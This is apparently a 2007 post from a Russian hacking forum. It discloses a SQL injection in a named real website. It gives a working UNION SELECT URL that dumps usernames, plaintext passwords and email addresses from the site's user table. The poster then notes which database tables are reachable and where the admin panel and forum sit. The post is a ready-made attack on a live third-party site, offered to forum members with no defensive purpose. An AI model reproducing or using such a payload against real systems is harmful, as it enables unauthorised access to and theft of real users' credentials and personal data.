09.05.2007, 11:34
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Выводит юзеров и пассы (в открытом виде). Так же мыла. Админа не нашёл, хотя особо не искал.
http://www.sota1.ru/week_news.php3?News_id=-17012+union+select+1,2,3,4,5,6,7,concat(login,0x3a ,password,0x3a,email),9+from+user+limit+1,1
Открыт доступ к таблицам user & users. (они идентичны). Закрыт доступ к таблицам mysql.user & mysql.users.
Админка: http://www.sota1.ru/phoneadmin
Форум: http://www.sota1.ru/phorum
К админке пассы выводимые из таблицы user конечно не подходят. Таблицы phorum.user & phpbb.user тоже закрыты. |
|
|